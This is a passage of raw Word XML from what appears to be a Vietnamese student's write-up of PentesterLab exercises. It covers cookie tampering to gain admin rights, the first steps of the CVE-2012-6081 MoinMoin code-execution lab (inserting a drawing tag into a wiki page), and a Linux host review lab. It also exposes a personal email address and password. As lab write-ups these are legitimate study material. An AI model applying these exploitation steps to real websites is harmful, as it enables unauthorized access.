        <w:t xml:space="preserve"> chỉ là 1 người dùng bình thường</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED6AA49" w14:textId="77777777" w:rsidR="00A70F8A" w:rsidRPr="00F12C2B" w:rsidRDefault="00A70F8A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Khi ta so sánh được 2 người dùng thường và một admin chính thức thì chỉ khác nhau ở số </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, và như thế chúng ta sẽ thay đổi số </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> ở </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>admin1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> đem chèn vào phía trước </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>%7C1605…</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> thành </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>%7C11605</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">... Và đơn giản hệ thống đã nhầm ta là admin1 user thường thành một admin chính thức!! </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4F8AEE" w14:textId="2BA8ED3B" w:rsidR="00A70F8A" w:rsidRPr="00F12C2B" w:rsidRDefault="00283404" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="327E2046">
          <v:shape id="_x0000_i1194" type="#_x0000_t75" style="width:468pt;height:156.75pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId187" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1291D98E" w14:textId="77777777"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Và done!! Chúng ta đã trở thành 1 admin chính hiệu kkk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0BCCCE" w14:textId="6A06AE65" w:rsidR="00A70F8A" w:rsidRPr="00F12C2B" w:rsidRDefault="00A70F8A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>So Ez!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42614EFD" w14:textId="0D816147" w:rsidR="00425DDD"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6</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00A70F8A" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> CVE-2012-6081: MoinMoin code execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C7FF33" w14:textId="77777777" w:rsidR="00A70F8A" w:rsidRPr="00F12C2B" w:rsidRDefault="00A70F8A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>1.Giới thiệu:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079607AB" w14:textId="77777777" w:rsidR="00A70F8A" w:rsidRPr="00F12C2B" w:rsidRDefault="00A70F8A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Link bài tập pentesterlab: </w:t>
      </w:r>
      <w:hyperlink r:id="rId188" w:history="1">
        <w:r w:rsidRPr="00F12C2B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
          </w:rPr>
          <w:t>https://pentesterlab.com/exercises/cve-2012-6081/course?fbclid=IwAR2TzyWX79JD_8X03c24SAR1DU7qcz7-x4v2ORjUz23V7h_ma_x_4zYY0oE</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="21B0F12E" w14:textId="77777777" w:rsidR="00A70F8A" w:rsidRPr="00F12C2B" w:rsidRDefault="00A70F8A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Đây là bài lab tận dụng khai thác lỗ hỏng trong quá trình thực thi mã của ứng dụng web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C21452F" w14:textId="77777777" w:rsidR="00A70F8A" w:rsidRPr="00F12C2B" w:rsidRDefault="00A70F8A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Sử dụng lỗ hổng để triển khai plugin của chúng ta và xem các tệp được tạo trên hệ thống.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4367DCE3" w14:textId="77777777" w:rsidR="00A70F8A" w:rsidRPr="00F12C2B" w:rsidRDefault="00A70F8A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>2.Khai Thác:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0291CEE1" w14:textId="77777777" w:rsidR="00A70F8A" w:rsidRPr="00F12C2B" w:rsidRDefault="00A70F8A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Giao diện trang web: khi truy cập vào </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>192.168.75.11/moin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBA3C1F" w14:textId="77777777" w:rsidR="00A70F8A" w:rsidRPr="00F12C2B" w:rsidRDefault="00283404" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="7F964BE8">
          <v:shape id="Picture 1" o:spid="_x0000_i1195" type="#_x0000_t75" style="width:468pt;height:247.5pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId189" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A13573"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 xml:space="preserve">Bấm nút đăng nhập </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>login</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788C527E"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43EB0A01">
          <v:shape id="Picture 2" o:spid="_x0000_i1196" type="#_x0000_t75" style="width:468pt;height:139.5pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId190" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A45A42F"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 xml:space="preserve">Chúng ta nhấn vào đường dẫn </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>you can create one now</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> để tạo tài khoản.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB87505"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2AEB929E">
          <v:shape id="Picture 3" o:spid="_x0000_i1197" type="#_x0000_t75" style="width:468pt;height:153pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId191" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6E0167"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 xml:space="preserve">Tạo tài khoản </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7638BC48"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Username: thienphuc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799C1DB3"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Password: Phuc@1808</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752C4C7E"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Email: tranlethienphuc99@gmail.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7F7057"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u w:val="single"/>
        </w:rPr>
        <w:t>Lưu ý:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> phải đặt mật khẩu mức độ bảo mật cao!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1705891B"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 xml:space="preserve">Và nhấn tạo </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>profile!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A699FEF"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2A649177">
          <v:shape id="Picture 4" o:spid="_x0000_i1198" type="#_x0000_t75" style="width:468pt;height:144.75pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId192" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="51296678"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Sau đó ta đăng nhập vào hệ thống bằng user mới tạo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4CF0D8"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Ấn vào tên user thienphuc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC073D8"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6F2D4271">
          <v:shape id="Picture 5" o:spid="_x0000_i1199" type="#_x0000_t75" style="width:467.25pt;height:192pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId193" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="68291C74"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 xml:space="preserve">Sau đó ấn vào </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Create my home page now!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C357911"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365ADC71">
          <v:shape id="Picture 6" o:spid="_x0000_i1200" type="#_x0000_t75" style="width:468pt;height:219.75pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId194" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A723C5E" w14:textId="77777777" w:rsidR="00A70F8A" w:rsidRPr="00F12C2B" w:rsidRDefault="00A70F8A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B82CF06"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Ta sẽ chèn dòng lệnh {{drawing:test.adraw}} vào bất cứ đâu trong đoạn text.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344CC9CF"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56C7AA66">
          <v:shape id="Picture 7" o:spid="_x0000_i1201" type="#_x0000_t75" style="width:468pt;height:186.75pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId195" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E6DF9F"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Tiếp theo nhấn lưu các thay đổi!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341D8CF0" w14:textId="77777777" w:rsidR="00A70F8A" w:rsidRPr="00F12C2B" w:rsidRDefault="00A70F8A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Sau khi nhấn lưu chúng ta sẽ thấy được biểu tượng đính kèm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB4932D" w14:textId="77777777" w:rsidR="00A70F8A" w:rsidRPr="00F12C2B" w:rsidRDefault="00283404" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="44E0F29B">
          <v:shape id="Picture 8" o:spid="_x0000_i1202" type="#_x0000_t75" style="width:468pt;height:161.25pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId196" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C61FC1" w14:textId="77777777" w:rsidR="00A70F8A" w:rsidRPr="00F12C2B" w:rsidRDefault="00A70F8A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29B16D25" w14:textId="1F9E6B9B" w:rsidR="00425DDD"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7</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="0094433F" w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> Linux Host Review</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045FC316" w14:textId="2F32A489" w:rsidR="00495E7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00495E7A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>1.Giới thiệu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CBE2E7" w14:textId="77777777" w:rsidR="00495E7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00495E7A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Bài lab lần này giới thiệu về thực hiện cấu hình hệ thống Linux và đánh giá về phần cứng của Linux. Bài lần này thể hiện rõ chi tiết từng bước và cung cấp các ví dụ về các vấn đề của máy chủ linux. Đây không phải là một cách để kiểm tra hệ thống Linux, bài tập này được xem như là để tiếp cận một máy chủ và hiểu được những vấn đề bảo mật</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CCB5CB"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Link bài tập: </w:t>
      </w:r>
      <w:hyperlink r:id="rId197" w:history="1">
        <w:r w:rsidRPr="00F12C2B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          </w:rPr>
          <w:t>https://pentesterlab.com/exercises/linux_host_review/course?fbclid=IwAR0j3GFLkcZnvO2d-aeUIpN-RrpVd7J8btM_FRg_Fy-0eKA9koWaFErqLvg</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="786732F1" w14:textId="7B0FB961" w:rsidR="00495E7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00495E7A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>2.Khai thác</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1A2DAE"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rước tiên chúng ta tải putty: </w:t>
      </w:r>
      <w:hyperlink r:id="rId198" w:history="1">
        <w:r w:rsidRPr="00F12C2B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          </w:rPr>
          <w:t>https://the.earth.li/~sgtatham/putty/latest/w64/putty.exe</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="495735DD" w14:textId="77777777" w:rsidR="00495E7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00495E7A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Sau đó vào giao diện putty. Nhập địa chỉ ip và port ssh để kết nối đến máy chủ rồi nhấn open.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BA4E55" w14:textId="2C6A7931"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2E37C417">
          <v:shape id="Picture 45" o:spid="_x0000_i1203" type="#_x0000_t75" style="width:241.5pt;height:238.5pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId199" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="535BCDB2" w14:textId="77777777" w:rsidR="00495E7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00495E7A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Ta sẽ được giao diện:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03EF160F" w14:textId="7C47524A"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3E17B64">
          <v:shape id="Picture 46" o:spid="_x0000_i1204" type="#_x0000_t75" style="width:325.5pt;height:206.25pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId200" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="062E029D" w14:textId="77777777" w:rsidR="00495E7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00495E7A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Giao diện ở đây yêu cầu chúng ta nhập tên user đã có sẵn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E26E740" w14:textId="77777777" w:rsidR="00495E7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00495E7A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Ta nhập:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25824E28"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Username: user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12FD0816"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Password: live</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102BE646" w14:textId="214017AA"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F8FF895">
          <v:shape id="Picture 47" o:spid="_x0000_i1205" type="#_x0000_t75" style="width:405pt;height:138.75pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId201" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2DBA55" w14:textId="1B92E8F6" w:rsidR="00495E7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00495E7A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Ngay lần truy cập đầu tiên chúng ta sử dụng lên sudo –s để thực thi quyền root.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185243D8" w14:textId="5917CD24"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A256EC9">
          <v:shape id="Picture 48" o:spid="_x0000_i1206" type="#_x0000_t75" style="width:399.75pt;height:129.75pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId202" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="27017DC7"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Sử dụng lệnh screen để vào màn hình </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F42F9A1" w14:textId="45439B14"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5B2F6BB3">
          <v:shape id="Picture 49" o:spid="_x0000_i1207" type="#_x0000_t75" style="width:445.5pt;height:183.75pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId203" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="476F9A7C" w14:textId="77777777" w:rsidR="00495E7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00495E7A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Nhấn Space để vào screen ghi log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8670C6" w14:textId="77777777" w:rsidR="00495E7A" w:rsidRPr="00F12C2B" w:rsidRDefault="00495E7A" w:rsidP="00AC2F30">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Sau đó ta dùng phím tắt Ctrl+a và Shift+H</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A11AB9" w14:textId="169747EB"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2C6E17E4">
          <v:shape id="Picture 50" o:spid="_x0000_i1208" type="#_x0000_t75" style="width:192pt;height:34.5pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId204" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="568AE6ED"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ể tạo logfile </w:t>
      </w:r>
    </w:p>
